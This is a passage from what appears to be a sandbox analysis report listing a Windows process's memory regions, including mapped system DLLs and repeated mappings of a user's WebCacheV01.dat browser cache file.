"\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 621 start_va = 0x7fffedee0000 end_va = 0x7fffedf31fff monitored = 0 entry_point = 0x7fffedeef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 622 start_va = 0x7fffedf50000 end_va = 0x7fffedf8afff monitored = 0 entry_point = 0x7fffedf512f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 623 start_va = 0x7fffee060000 end_va = 0x7fffef5befff monitored = 0 entry_point = 0x7fffee1c11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 624 start_va = 0x7fffef9f0000 end_va = 0x7fffefc6cfff monitored = 0 entry_point = 0x7fffefac4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 625 start_va = 0x7fffefd90000 end_va = 0x7fffefeabfff monitored = 0 entry_point = 0x7fffefdd02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 626 start_va = 0x7fffefeb0000 end_va = 0x7fffeff5cfff monitored = 0 entry_point = 0x7fffefec81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 627 start_va = 0x7fffeff60000 end_va = 0x7ffff00b5fff monitored = 0 entry_point = 0x7fffeff6a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 628 start_va = 0x7ffff00c0000 end_va = 0x7ffff0180fff monitored = 0 entry_point = 0x7ffff00e0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 629 start_va = 0x7ffff0340000 end_va = 0x7ffff04c5fff monitored = 0 entry_point = 0x7ffff038ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 630 start_va = 0x7ffff0700000 end_va = 0x7ffff079cfff monitored = 0 entry_point = 0x7ffff07078a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 631 start_va = 0x7ffff07a0000 end_va = 0x7ffff0960fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 646 start_va = 0x1cd55ae0000 end_va = 0x1cd55ae0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd55ae0000" filename = "" Region: id = 647 start_va = 0x1cd55ae0000 end_va = 0x1cd55aeffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 648 start_va = 0x1cd55ef0000 end_va = 0x1cd55ef7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd55ef0000" filename = "" Region: id = 649 start_va = 0x1cd55f00000 end_va = 0x1cd55f0ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 650 start_va = 0x1cd55f10000 end_va = 0x1cd55f17fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd55f10000" filename = "" Region: id = 651 start_va = 0x1cd55f20000 end_va = 0x1cd55f20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd55f20000" filename = "" Region: id = 652 start_va = 0x1cd55f20000 end_va = 0x1cd55f20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd55f20000" filename = "" Region: id = 653 start_va = 0x1cd55f20000 end_va = 0x1cd55f20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd55f20000" filename = "" Region: id = 654 start_va = 0x1cd55f20000 end_va = 0x1cd55f27fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd55f20000" filename = "" Region: id = 655 start_va = 0x1cd55f20000 end_va = 0x1cd55f27fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd55f20000" filename = "" Region: id = 656 start_va = 0x1cd55f30000 end_va = 0x1cd55f37fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd55f30000" filename = "" Region: id = 657 start_va = 0x1cd55f40000 end_va = 0x1cd55f47fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd55f40000" filename = "" Region: id = 658 start_va = 0x1cd55f50000 end_va = 0x1cd55f57fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd55f50000" filename = "" Region: id = 659 start_va = 0x1cd55f60000 end_va = 0x1cd55f67fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd55f60000" filename = "" Region: id = 660 start_va = 0x1cd55f70000 end_va = 0x1cd55f77fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd55f70000" filename = "" Region: id = 661 start_va = 0x1cd55f80000 end_va = 0x1cd55f87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd55f80000" filename = "" Region: id = 662 start_va = 0x1cd55f90000 end_va = 0x1cd55f97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd55f90000" filename = "" Region: id = 663 start_va = 0x1cd55fa0000 end_va = 0x1cd55fa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd55fa0000" filename = "" Region: id = 664 start_va = 0x1cd55fb0000 end_va = 0x1cd55fb7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd55fb0000" filename = "" Region: id = 665 start_va = 0x1cd55fc0000 end_va = 0x1cd55fc7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd55fc0000" filename = "" Region: id = 666 start_va = 0x1cd55fd0000 end_va = 0x1cd55fd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd55fd0000" filename = "" Region: id = 667 start_va = 0x1cd55fe0000 end_va = 0x1cd55fe7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd55fe0000" filename = "" Region: id = 668 start_va = 0x1cd55ff0000 end_va = 0x1cd55ff7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd55ff0000" filename = "" Region: id = 669 start_va = 0x1cd56000000 end_va = 0x1cd56007fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56000000" filename = "" Region: id = 670 start_va = 0x1cd56010000 end_va = 0x1cd56017fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56010000" filename = "" Region: id = 671 start_va = 0x1cd56020000 end_va = 0x1cd56027fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56020000" filename = "" Region: id = 672 start_va = 0x1cd56030000 end_va = 0x1cd56037fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56030000" filename = "" Region: id = 673 start_va = 0x1cd56040000 end_va = 0x1cd56040fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56040000" filename = "" Region: id = 674 start_va = 0x1cd56040000 end_va = 0x1cd56040fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56040000" filename = "" Region: id = 675 start_va = 0x1cd56040000 end_va = 0x1cd56047fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56040000" filename = "" Region: id = 676 start_va = 0x1cd56040000 end_va = 0x1cd56047fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56040000" filename = "" Region: id = 677 start_va = 0x1cd56050000 end_va = 0x1cd56057fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56050000" filename = "" Region: id = 678 start_va = 0x1cd56060000 end_va = 0x1cd56067fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56060000" filename = "" Region: id = 679 start_va = 0x1cd56070000 end_va = 0x1cd56077fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56070000" filename = "" Region: id = 680 start_va = 0x1cd56080000 end_va = 0x1cd56087fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56080000" filename = "" Region: id = 681 start_va = 0x1cd56090000 end_va = 0x1cd56097fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56090000" filename = "" Region: id = 682 start_va = 0x1cd560a0000 end_va = 0x1cd560a7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd560a0000" filename = "" Region: id = 683 start_va = 0x1cd560b0000 end_va = 0x1cd560b7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd560b0000" filename = "" Region: id = 684 start_va = 0x1cd560c0000 end_va = 0x1cd560c7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd560c0000" filename = "" Region: id = 685 start_va = 0x1cd560d0000 end_va = 0x1cd560d7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd560d0000" filename = "" Region: id = 686 start_va = 0x1cd560e0000 end_va = 0x1cd560e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd560e0000" filename = "" Region: id = 687 start_va = 0x1cd560f0000 end_va = 0x1cd560f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd560f0000" filename = "" Region: id = 688 start_va = 0x1cd56100000 end_va = 0x1cd56107fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56100000" filename = "" Region: id = 689 start_va = 0x1cd56110000 end_va = 0x1cd56117fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56110000" filename = "" Region: id = 690 start_va = 0x1cd56120000 end_va = 0x1cd56120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56120000" filename = "" Region: id = 691 start_va = 0x1cd56120000 end_va = 0x1cd56120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56120000" filename = "" Region: id = 692 start_va = 0x1cd56120000 end_va = 0x1cd56127fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56120000" filename = "" Region: id = 693 start_va = 0x1cd56120000 end_va = 0x1cd56127fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56120000" filename = "" Region: id = 694 start_va = 0x1cd56130000 end_va = 0x1cd56137fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56130000" filename = "" Region: id = 695 start_va = 0x1cd56140000 end_va = 0x1cd56147fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56140000" filename = "" Region: id = 696 start_va = 0x1cd56150000 end_va = 0x1cd56157fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56150000" filename = "" Region: id = 697 start_va = 0x1cd56160000 end_va = 0x1cd56167fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56160000" filename = "" Region: id = 698 start_va = 0x1cd56170000 end_va = 0x1cd56177fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56170000" filename = "" Region: id = 699 start_va = 0x1cd56180000 end_va = 0x1cd56187fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56180000" filename = "" Region: id = 700 start_va = 0x1cd56190000 end_va = 0x1cd5619ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 701 start_va = 0x1cd55ef0000 end_va = 0x1cd55efffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 702 start_va = 0x1cd55f10000 end_va = 0x1cd55f1ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 703 start_va = 0x1cd55f20000 end_va = 0x1cd55f2ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 704 start_va = 0x1cd55f30000 end_va = 0x1cd55f3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 705 start_va = 0x1cd55f40000 end_va = 0x1cd55f4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 706 start_va = 0x1cd55f50000 end_va = 0x1cd55f5ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 707 start_va = 0x1cd55f60000 end_va = 0x1cd55f6ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 708 start_va = 0x1cd55f70000 end_va = 0x1cd55f7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 709 start_va = 0x1cd55f80000 end_va = 0x1cd55f8ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 710 start_va = 0x1cd55f90000 end_va = 0x1cd55f9ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 711 start_va = 0x1cd55fa0000 end_va = 0x1cd55faffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 712 start_va = 0x1cd55fb0000 end_va = 0x1cd55fbffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 713 start_va = 0x1cd55fc0000 end_va = 0x1cd55fcffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 714 start_va = 0x1cd55fd0000 end_va = 0x1cd55fdffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 715 start_va = 0x1cd55fe0000 end_va = 0x1cd55feffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 716 start_va = 0x1cd55ff0000 end_va = 0x1cd55ffffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 717 start_va = 0x1cd56000000 end_va = 0x1cd5600ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 718 start_va = 0x1cd56010000 end_va = 0x1cd5601ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 719 start_va = 0x1cd56020000 end_va = 0x1cd5602ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 720 start_va = 0x1cd56030000 end_va = 0x1cd5603ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 721 start_va = 0x1cd56040000 end_va = 0x1cd5604ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 722 start_va = 0x1cd56050000 end_va = 0x1cd5605ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 723 start_va = 0x1cd56060000 end_va = 0x1cd5606ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 724 start_va = 0x1cd56070000 end_va = 0x1cd5607ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 725 start_va = 0x1cd56080000 end_va = 0x1cd5608ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 726 start_va = 0x1cd56090000 end_va = 0x1cd5609ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 727 start_va = 0x1cd560a0000 end_va = 0x1cd560affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 728 start_va = 0x1cd560b0000 end_va = 0x1cd560bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 729 start_va = 0x1cd560c0000 end_va = 0x1cd560cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 730 start_va = 0x1cd560d0000 end_va = 0x1cd560dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 731 start_va = 0x1cd560e0000 end_va = 0x1cd560effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 732 start_va = 0x1cd560f0000 end_va = 0x1cd560fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 733 start_va = 0x1cd56100000 end_va = 0x1cd5610ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 734 start_va = 0x1cd56110000 end_va = 0x1cd5611ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 735 start_va = 0x1cd56120000 end_va = 0x1cd5612ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 736 start_va = 0x1cd56170000 end_va = 0x1cd5617ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 737 start_va = 0x1cd56130000 end_va = 0x1cd5613ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 738 start_va = 0x1cd56140000 end_va = 0x1cd5614ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 739 start_va = 0x1cd56150000 end_va = 0x1cd5615ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 740 start_va = 0x1cd56160000 end_va = 0x1cd5616ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 741 start_va = 0x1cd56180000 end_va = 0x1cd56180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56180000" filename = "" Region: id = 742 start_va = 0x1cd561a0000 end_va = 0x1cd561a7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd561a0000" filename = "" Region: id = 743 start_va = 0x1cd56180000 end_va = 0x1cd56187fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56180000" filename = "" Region: id = 744 start_va = 0x1cd561a0000 end_va = 0x1cd561a7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd561a0000" filename = "" Region: id = 745 start_va = 0x1cd561b0000 end_va = 0x1cd561b7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd561b0000" filename = "" Region: id = 746 start_va = 0x1cd561c0000 end_va = 0x1cd561c7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd561c0000" filename = "" Region: id = 747 start_va = 0x1cd561d0000 end_va = 0x1cd561d7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd561d0000" filename = "" Region: id = 748 start_va = 0x1cd561e0000 end_va = 0x1cd561e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd561e0000" filename = "" Region: id = 749 start_va = 0x1cd561f0000 end_va = 0x1cd561f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd561f0000" filename = "" Region: id = 750 start_va = 0x1cd56200000 end_va = 0x1cd56207fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56200000" filename = "" Region: id = 751 start_va = 0x1cd56210000 end_va = 0x1cd56210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56210000" filename = "" Region: id = 752 start_va = 0x1cd56210000 end_va = 0x1cd56210fff monitored = 1 entry_point = 0x0 